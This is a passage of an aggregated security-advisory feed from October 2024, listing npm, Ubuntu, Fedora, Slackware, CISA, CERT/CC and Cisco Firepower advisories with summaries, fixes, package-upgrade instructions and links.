22.10.2024 22:22:20	npm	[NPM:GHSA-C5G6-6XF7-QXP3] Umbraco CMS vulnerable to stored Cross-site Scripting in the "dictionary name" on Dictionary section (moderate)	### ImpactThis can be leveraged to gain access to higher-privilege endpoints, e.g. if you get a user with admin privileges to run the code, you can potentially elevate all users and grant them admin privileges or access protected content.### PatchesWill be patched in 14.3.1 and 15.0.0.### WorkaroundsEnsure that access to the Dictionary section is only granted to trusted users.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C5G6-6XF7-QXP3
22.10.2024 16:09:25	ubuntu	[USN-7080-1] Unbound vulnerability (medium)	Unbound could be made to stop responding if it received specially craftedDNS traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7080-1
22.10.2024 14:42:16	ubuntu	[USN-7079-1] WebKitGTK vulnerabilities (medium)	Several security issues were fixed in WebKitGTK.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7079-1
22.10.2024 07:28:33	ubuntu	[USN-7078-1] Firefox vulnerability	Firefox could be made to crash or run programs as your login	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7078-1
22.10.2024 03:00:00	cisa	[CISA-2024:1022] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:1022
22.10.2024 00:31:34	slackware	[SSA:2024-295-01] openssl	New openssl packages are available for Slackware 15.0 to fix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/openssl-1.1.1zb-i586-1_slack15.0.txz: Upgraded. Apply patch to fix a security issue: Harden BN_GF2m_poly2arr against misuse. This CVE was fixed by the 1.1.1zb release that is only available to subscribers to OpenSSL's premium extended support. The patch was prepared by backporting from the OpenSSL-3.0 repo. The reported version number has been updated so that vulnerability scanners calm down. Thanks to Ken Zalewski for the patch! For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-9143 (* Security fix )patches/packages/openssl-solibs-1.1.1zb-i586-1_slack15.0.txz: Upgraded.```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openssl-1.1.1zb-i586-1_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openssl-solibs-1.1.1zb-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openssl-1.1.1zb-x86_64-1_slack15.0.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openssl-solibs-1.1.1zb-x86_64-1_slack15.0.txzMD5 signaturesSlackware 15.0 package:bc3ff191e19ec27b384056420cb2109c openssl-1.1.1zb-i586-1_slack15.0.txzc8465e76a2801dbae13c4e519b4ad91b openssl-solibs-1.1.1zb-i586-1_slack15.0.txzSlackware x86_64 15.0 package:4e693fe5a69f57968c829c59f8b89c6b openssl-1.1.1zb-x86_64-1_slack15.0.txzff52911f9a5dafd4efc46afcbddb3831 openssl-solibs-1.1.1zb-x86_64-1_slack15.0.txzInstallation instructions*Upgrade the package as root:`# upgradepkg openssl-1.1.1zb-i586-1_slack15.0.txz openssl-solibs-1.1.1zb-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-295-01
22.10.2024 22:47:42	npm	[NPM:GHSA-C7QV-Q95Q-8V27] Denial of service in http-proxy-middleware (high)	Versions of the package http-proxy-middleware before 2.0.7, from 3.0.0 and before 3.0.3 are vulnerable to Denial of Service (DoS) due to an UnhandledPromiseRejection error thrown by micromatch. An attacker could kill the Node.js process and crash the server by making requests to certain paths.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C7QV-Q95Q-8V27
24.10.2024 04:28:49	fedora	[FEDORA-2024-f1615b58e6] Fedora 40: python-openapi-core, python-platformio, python-fastapi, python-starlette (none)	Security fix for CVE-2024-47874.Starlette 0.40.0 (October 15, 2024)This release fixes a Denial of service (DoS) via multipart/form-data requests.You can view the full security advisory:GHSA-f96h-pmfr-66vwFixedAdd max_part_size to MultiPartParser to limit the size of parts inmultipart/form-data requests fd038f3.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f1615b58e6
24.10.2024 04:28:43	fedora	[FEDORA-2024-87d8204201] Fedora 40: dotnet6.0	This is the October 2024 monthly update for .NET 6.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/6.0/6.0.35/6.0.135.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/6.0/6.0.35/6.0.35.md	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-87d8204201
24.10.2024 04:28:42	fedora	[FEDORA-2024-23292e9f6d] Fedora 40: rust-pyo3-build-config, rust-pyo3-macros, rust-pyo3-macros-backend, rust-pyo3, rust-pyo3-ffi	Update pyo3 to version 0.22.4.This version addresses a potential use-after-free RUSTSEC-2024-0378.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-23292e9f6d
24.10.2024 04:28:42	fedora	[FEDORA-2024-66b0bdad35] Fedora 40: yarnpkg (critical)	Update bundled ws (CVE-2024-37890)Update bundled elliptic to fix CVE-2024-48949.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-66b0bdad35
24.10.2024 04:20:52	fedora	[FEDORA-2024-00855b1d76] Fedora 39: dotnet6.0	This is the October 2024 monthly update for .NET 6.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/6.0/6.0.35/6.0.135.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/6.0/6.0.35/6.0.35.md	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-00855b1d76
24.10.2024 04:20:51	fedora	[FEDORA-2024-d79685d847] Fedora 39: yarnpkg (critical)	Update bundled ws (CVE-2024-37890)Update bundled dependencies to fix CVE-2024-48949.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d79685d847
24.10.2024 04:20:50	fedora	[FEDORA-2024-44f01d9c69] Fedora 39: rust-pyo3, rust-pyo3-build-config, rust-pyo3-macros, rust-pyo3-ffi, rust-pyo3-macros-backend	Update pyo3 to version 0.22.4.This version addresses a potential use-after-free RUSTSEC-2024-0378.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-44f01d9c69
24.10.2024 04:20:46	fedora	[FEDORA-2024-ef4911442d] Fedora 39: koji	Update to 1.35.1. Includes fix for CVE-2024-9427	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ef4911442d
24.10.2024 00:41:02	npm	[NPM:GHSA-QQQW-GM93-QF6M] OS Command Injection in Snyk gradle plugin (high)	The Snyk gradle plugin is vulnerable to Code Injection when scanning an untrusted Gradle project. The vulnerability can be triggered if Snyk test is run inside the untrusted project due to the improper handling of the current working directory name. Snyk recommends only scanning trusted projects.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QQQW-GM93-QF6M
24.10.2024 00:40:15	npm	[NPM:GHSA-69F9-H8F9-7VJF] OS Command Injection in Snyk php plugin (high)	The Snyk php plugin is vulnerable to Code Injection when scanning an untrusted PHP project. The vulnerability can be triggered if Snyk test is run inside the untrusted project due to the improper handling of the current working directory name. Snyk recommends only scanning trusted projects.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-69F9-H8F9-7VJF
23.10.2024 22:42:15	slackware	[SSA:2024-297-01] php81 (critical)	New php81 packages are available for Slackware 15.0 to fix security issues.Here are the details from the Slackware 15.0 ChangeLog```extra/php81/php81-8.1.30-i586-1_slack15.0.txz: Upgraded. This update fixes bugs and security issues: Bypass of CVE-2024-4577, Parameter Injection Vulnerability. cgi.force_redirect configuration is bypassable due to the environment variable collision. Logs from childrens may be altered. Erroneous parsing of multipart form data. For more information, see: https://www.php.net/ChangeLog-8.php#8.1.30 https://www.cve.org/CVERecord?id=CVE-2024-8926 https://www.cve.org/CVERecord?id=CVE-2024-8927 https://www.cve.org/CVERecord?id=CVE-2024-9026 https://www.cve.org/CVERecord?id=CVE-2024-8925 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/php81/php81-8.1.30-i586-1_slack15.0.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/php81/php81-8.1.30-x86_64-1_slack15.0.txzMD5 signaturesSlackware 15.0 packages:f5f02a4d41face4db9f0aa8e2a09c436 php81-8.1.30-i586-1_slack15.0.txzSlackware x86_64 15.0 packages:7487a753cfebb64142474e278c703908 php81-8.1.30-x86_64-1_slack15.0.txzInstallation instructions*Upgrade the package as root:`# upgradepkg php81-8.1.30-i586-1_slack15.0.txz`Then, restart Apache httpd:`# /etc/rc.d/rc.httpd stop``# /etc/rc.d/rc.httpd start`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-297-01
23.10.2024 20:28:33	cert	[VU:123336] Vulnerable WiFi Alliance example code found in Arcadyan FMIMG51AX000J	### OverviewA command injection vulnerability has been identified in the Wi-Fi Test Suite, a tool developed by the WiFi Alliance, which has been found deployed on Arcadyan routers. This flaw allows an unauthenticated local attacker to exploit the Wi-Fi Test Suite by sending specially crafted packets, enabling the execution of arbitrary commands with root privileges on the affected routers.### DescriptionThe Wi-Fi Test Suite, as described by its developer, was originally created by the Wi-Fi Alliance—a global non-profit industry association responsible for Wi-Fi standards—to support the development of certification programs and device certification. This software was not designed for use in production environments. However, it has been discovered in commercial router deployments, exposing a vulnerbility in the test code in production. The Wi-Fi Test Suite contains vulnerable code that is susceptible to command injection attacks. An attacker can exploit this vulnerability by sending specially crafted packets to a device running the Wi-Fi Test Suite, allowing them to execute commands with administrative (root) privileges.CVE-2024-41992It is possible for an unauthenticated local attacker to use specially crafted packets to execute commands as root.### ImpactAn attacker who successfully exploits this vulnerability can gain full administrative control over the affected device. With this access, the attacker can modify system settings, disrupt critical network services, or reset the device entirely. These actions can result in service interruptions, compromise of network data, and potential loss of service for all users dependent on the affected network.### SolutionThe CERT/CC recommends that vendors, who have included the Wi-Fi Test Suite, to update it to version >=9.0 or remove it entirely from production devices to reduce the risk of exploitation.### AcknowledgementsThanks to the reporter Noam Rathaus from SSD Disclosure. This document was written by Timur Snoke.	https://secdb.nttzen.cloud/security-advisory/cert/VU:123336
23.10.2024 19:00:00	cisco	[CISCO-SA-SNORT-RF-BYPASS-OY8F3PNM] Multiple Cisco Products Snort Rate Filter Bypass Vulnerability (medium)	Multiple Cisco products are affected by a vulnerability in the rate filtering feature of the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured rate limiting filter.This vulnerability is due to an incorrect connection count comparison. An attacker could exploit this vulnerability by sending traffic through an affected device at a rate that exceeds a configured rate filter. A successful exploit could allow the attacker to successfully bypass the rate filter. This could allow unintended traffic to enter the network protected by the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SNORT-RF-BYPASS-OY8F3PNM
23.10.2024 19:00:00	cisco	[CISCO-SA-SNORT-BYPASS-PTRY37FX] Cisco Firepower Threat Defense Software TCP Snort 3 Detection Engine Bypass Vulnerability (medium)	A vulnerability in the interaction between the TCP Intercept feature and the Snort 3 detection engine on Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured policies on an affected system. Devices that are configured with Snort 2 are not affected by this vulnerability.This vulnerability is due to a logic error when handling embryonic (half-open) TCP connections. An attacker could exploit this vulnerability by sending a crafted traffic pattern through an affected device. A successful exploit could allow unintended traffic to enter the network protected by the affected device.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SNORT-BYPASS-PTRY37FX
23.10.2024 19:00:00	cisco	[CISCO-SA-SA-FTD-SNORT-FW-BCJTZPMU] Cisco Firepower Threat Defense Software and Cisco FirePOWER Services TCP/IP Traffic with Snort 2 and Snort 3 Denial of Service Vulnerability (high)	A vulnerability in the TCP/IP traffic handling function of the Snort Detection Engine of Cisco Firepower Threat Defense (FTD) Software and Cisco FirePOWER Services could allow an unauthenticated, remote attacker to cause legitimate network traffic to be dropped, resulting in a denial of service (DoS) condition.This vulnerability is due to the improper handling of TCP/IP network traffic. An attacker could exploit this vulnerability by sending a large amount of TCP/IP network traffic through the affected device. A successful exploit could allow the attacker to cause the Cisco FTD device to drop network traffic, resulting in a DoS condition. The affected device must be rebooted to resolve the DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SA-FTD-SNORT-FW-BCJTZPMU
23.10.2024 19:00:00	cisco	[CISCO-SA-FTD2100-SNORT-DOS-M9HUMT75] Cisco Firepower Threat Defense Software for Cisco Firepower 2100 Series Appliances TCP UDP Snort 2 and Snort 3 Denial of Service Vulnerability (high)	A vulnerability in the Snort 2 and Snort 3 TCP and UDP detection engine of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series Appliances could allow an unauthenticated, remote attacker to cause memory corruption, which could cause the Snort detection engine to restart unexpectedly.This vulnerability is due to improper memory management when the Snort detection engine processes specific TCP or UDP packets. An attacker could exploit this vulnerability by sending crafted TCP or UDP packets through a device that is inspecting traffic using the Snort detection engine. A successful exploit could allow the attacker to restart the Snort detection engine repeatedly, which could cause a denial of service (DoS) condition. The DoS condition impacts only the traffic through the device that is examined by the Snort detection engine. The device can still be managed over the network.Note: Once a memory block is corrupted, it cannot be cleared until the Cisco Firepower 2100 Series Appliance is manually reloaded. This means that the Snort detection engine could crash repeatedly, causing traffic that is processed by the Snort detection engine to be dropped until the device is manually reloaded.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FTD2100-SNORT-DOS-M9HUMT75
23.10.2024 19:00:00	cisco	[CISCO-SA-FTD-TLS-DOS-QXYE5UFY] Cisco Firepower Threat Defense Software for Firepower 2100 Series TLS Denial of Service Vulnerability (high)	A vulnerability in the TLS processing feature of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to an issue that occurs when TLS traffic is processed. An attacker could exploit this vulnerability by sending certain TLS traffic over IPv4 through an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition and impacting traffic to and through the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FTD-TLS-DOS-QXYE5UFY
23.10.2024 19:00:00	cisco	[CISCO-SA-FTD-STATCRED-DFC8TXT5] Cisco Firepower Threat Defense Software for Firepower 1000, 2100, 3100, and 4200 Series Static Credential Vulnerability (critical)	A vulnerability in Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 1000, 2100, 3100, and 4200 Series could allow an unauthenticated, local attacker to access an affected system using static credentials.This vulnerability is due to the presence of static accounts with hard-coded passwords on an affected system. An attacker could exploit this vulnerability by logging in to the CLI of an affected device with these credentials. A successful exploit could allow the attacker to access the affected system and retrieve sensitive information, perform limited troubleshooting actions, modify some configuration options, or render the device unable to boot to the operating system, requiring a reimage of the device.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FTD-STATCRED-DFC8TXT5
23.10.2024 19:00:00	cisco	[CISCO-SA-FTD-GEOIP-BYPASS-MB4ZRDU] Cisco Firepower Threat Defense Software Geolocation ACL Bypass Vulnerability (medium)	A vulnerability in the geolocation access control feature of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass an access control policy.This vulnerability is due to improper assignment of geolocation data. An attacker could exploit this vulnerability by sending traffic through an affected device. A successful exploit could allow the attacker to bypass a geolocation-based access control policy and successfully send traffic to a protected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FTD-GEOIP-BYPASS-MB4ZRDU
23.10.2024 19:00:00	cisco	[CISCO-SA-FMC-XSS-INFODISC-RL4MJFER] Cisco Secure Firewall Management Center Software Cross-Site Scripting and Information Disclosure Vulnerabilities (medium)	Multiple vulnerabilities in Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an attacker to conduct cross-site scripting (XSS) attacks or access unauthorized information on an affected device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-XSS-INFODISC-RL4MJFER
23.10.2024 19:00:00	cisco	[CISCO-SA-FMC-XSS-DHJXQYZS] Cisco Secure Firewall Management Center Software Cross-Site Scripting Vulnerabilities (medium)	Multiple vulnerabilities in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device.These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-XSS-DHJXQYZS
23.10.2024 19:00:00	cisco	[CISCO-SA-FMC-SQL-INJECT-2ENMTC8V] Cisco Secure Firewall Management Center Software SQL Injection Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to perform an SQL injection attack against an affected device. To exploit this vulnerability, an attacker must have a valid account on the device with the role of Security Approver, Intrusion Admin, Access Admin, or Network Admin.This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to read the contents of databases on the affected device and also obtain limited read access to the underlying operating system.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-SQL-INJECT-2ENMTC8V
23.10.2024 19:00:00	cisco	[CISCO-SA-FMC-SQL-INJ-LOYAFCFQ] Cisco Secure Firewall Management Center Software SQL Injection Vulnerabilities (medium)	Multiple vulnerabilities in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system.These vulnerabilities exist because the web-based management interface does not validate user input adequately. An attacker could exploit these vulnerabilities by authenticating to the application as an Administrator and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to obtain unauthorized data from the database and make changes to the system. To exploit these vulnerabilities, an attacker would need Administrator-level privileges.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-SQL-INJ-LOYAFCFQ
23.10.2024 19:00:00	cisco	[CISCO-SA-FMC-PRIV-ESC-CMQ4S6M7] Cisco Secure Firewall Management Center Privilege Escalation Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to elevate privileges on an affected device. To exploit this vulnerability, an attacker must have a valid account on the device that is configured with a custom read-only role.This vulnerability is due to insufficient validation of role permissions in part of the web-based management interface. An attacker could exploit this vulnerability by performing a write operation on the affected part of the web-based management interface. A successful exploit could allow the attacker to modify certain parts of the configuration.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-PRIV-ESC-CMQ4S6M7
23.10.2024 19:00:00	cisco	[CISCO-SA-FMC-HTML-INJ-NFJEYHXZ] Cisco Secure Firewall Management Center Software HTML Injection Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to inject arbitrary HTML content into a device-generated document.This vulnerability is due to improper validation of user-supplied data. An attacker could exploit this vulnerability by submitting malicious content to an affected device and using the device to generate a document that contains sensitive information. A successful exploit could allow the attacker to alter the standard layout of the device-generated documents, access arbitrary files from the underlying operating system, and conduct server-side request forgery (SSRF) attacks. To successfully exploit this vulnerability, an attacker would need valid credentials for a user account with policy-editing permissions, such as Network Admin, Intrusion Admin, or any custom user role with the same capabilities.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-HTML-INJ-NFJEYHXZ
23.10.2024 19:00:00	cisco	[CISCO-SA-FMC-FILE-READ-5Q4MQRN] Cisco Secure Firewall Management Center Software Arbitrary File Read Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to read arbitrary files from the underlying operating system.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to read arbitrary files on the underlying operating system of the affected device. The attacker would need valid user credentials to exploit this vulnerability.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-FILE-READ-5Q4MQRN
23.10.2024 19:00:00	cisco	[CISCO-SA-FMC-CMD-INJ-V3AWDQN7] Cisco Secure Firewall Management Center Software Command Injection Vulnerability (critical)	A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system as root.This vulnerability is due to insufficient input validation of certain HTTP requests. An attacker could exploit this vulnerability by authenticating to the web-based management interface of an affected device and then sending a crafted HTTP request to the device. A successful exploit could allow the attacker to execute arbitrary commands with root permissions on the underlying operating system of the Cisco FMC device or to execute commands on managed Cisco Firepower Threat Defense (FTD) devices. To exploit this vulnerability, the attacker would need valid credentials for a user account with at least the role of Security Analyst (Read Only).Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-CMD-INJ-V3AWDQN7
23.10.2024 19:00:00	cisco	[CISCO-SA-FMC-CMD-INJ-G8AOKNDP] Cisco Secure Firewall Management Center Software Cluster Backup Command Injection Vulnerability (medium)	A vulnerability in the cluster backup feature of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system.This vulnerability is due to insufficient validation of user data that is supplied through the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute arbitrary operating system commands on the affected device. To exploit this vulnerability, an attacker would need valid credentials for a user account with at least the role of Network Administrator. In addition, the attacker would need to persuade a legitimate user to initiate a cluster backup on the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-FMC-CMD-INJ-G8AOKNDP
23.10.2024 19:00:00	cisco	[CISCO-SA-FMC-CMD-INJ-2HBKA97G] Cisco Secure Firewall Management Center Software Command Injection Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Secure Firewall Management Center (FMC) Software, formerly Firepower Management Center Software, could allow an authenticated, remote attacker with Administrator-level privileges to execute arbitrary commands on the underlying operating system.This vulnerability is due to insufficient input validation of certain HTTP request parameters that are sent to the web-based management interface. An attacker could exploit this vulnerability by authenticating to the Cisco FMC web-based management interface and sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute commands as the root user on the affected device. To exploit this vulnerability, an attacker would need Administrator-level credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the October 2024 release of the Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: October 2024 Semiannual Cisco ASA, FMC, and FTD Software Security Advisory Bundled Publication 